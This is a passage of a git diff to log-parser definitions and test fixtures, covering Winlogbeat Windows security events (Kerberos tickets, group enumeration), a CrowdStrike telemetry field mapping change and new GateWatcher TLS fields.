"TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "service" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 51261 + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "DOMAIN", + "name": "account" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOSTNAME.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4768", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 3228 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587536", + "task": "Service d\u2019authentification Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json new file mode 100644 index 000000000..ac4cdd94d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4769.json @@ -0,0 +1,101 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587153", + "task": "Op\u00e9rations de ticket du service Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json new file mode 100644 index 000000000..3e7783fbd --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4798.json @@ -0,0 +1,114 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4798", + "kind": "event", + "module": "security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:25:34.741000Z", + "action": { + "id": 4798, + "outcome": "success", + "properties": { + "CallerProcessId": "0x123", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACC0123$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "ACC0123", + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest" + } + }, + "agent": { + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "ACC0123", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "hostname", + "os": { + "build": "20348.169", + "family": "windows", + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACC0123" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACC0123", + "target": { + "domain": "ACC0123", + "name": "Guest" + } + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACC0123.johndoe.com", + "event_id": "4798", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1524672", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json index cde1d5c3c..8413484f9 100644 --- a/Beats/winlogbeat/tests/security_event_5140.json +++ b/Beats/winlogbeat/tests/security_event_5140.json @@ -93,11 +93,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json index 99a17d54f..ec1e78d54 100644 --- a/Beats/winlogbeat/tests/security_event_5145.json +++ b/Beats/winlogbeat/tests/security_event_5145.json @@ -96,13 +96,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml index 75e1b7434..a59b68006 100644 --- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml +++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml @@ -1,8 +1,3 @@ -crowdstrike.base_filename: - description: Base Filename - name: crowdstrike.base_filename - type: keyword - crowdstrike.customer_id: description: Customer ID (cid) name: crowdstrike.customer_id diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index 03e9819e7..5d0069c0a 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -53,9 +53,6 @@ stages: "host.domain": "{{parsed_event.message.MachineDomain}}" "host.mac": "{{parsed_event.message.MAC}}" - - set: - crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}" - set_registry_fields: actions: - set: @@ -180,9 +177,9 @@ stages: - set: "event.action": "{{parsed_event.message.event_simpleName}}" - "process.command_line": "{{parsed_event.message.CommandLine}}" + "process.command_line": "{{parsed_event.message.CommandLine or parsed_event.message.ContextBaseFileName}}" "process.executable": "{{parsed_event.message.ImageFileName}}" - "process.name": "{{parsed_event.message.ImageFileName | basename}}" + "process.name": "{{parsed_event.message.ImageFileName | basename or parsed_event.message.ContextBaseFileName}}" "process.thread.id": "{{parsed_event.message.SourceThreadId | int}}" "process.parent.name": "{{parsed_event.message.ParentBaseFileName}}" "process.parent.pid": "{{parsed_event.message.ParentProcessId}}" diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 1e7368eee..01e9a933f 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -18,7 +18,6 @@ "id": "111111111111111" }, "crowdstrike": { - "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { @@ -34,6 +33,10 @@ "platform": "win" } }, + "process": { + "command_line": "svchost.exe", + "name": "svchost.exe" + }, "related": { "ip": [ "4.3.2.1" diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index d0d85f7f6..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -385,11 +385,20 @@ gatewatcher.tlp: type: text gatewatcher.tls: - description: This field represents the tls field in a network metadata (used in - legacy format log) + description: This field contains all TLS data fields in a TLS metadata name: gatewatcher.tls type: text +gatewatcher.tls_fingerprint: + description: This field represents the TLS server fingerprint field in a TLS metadata + name: gatewatcher.tls_fingerprint + type: text + +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for 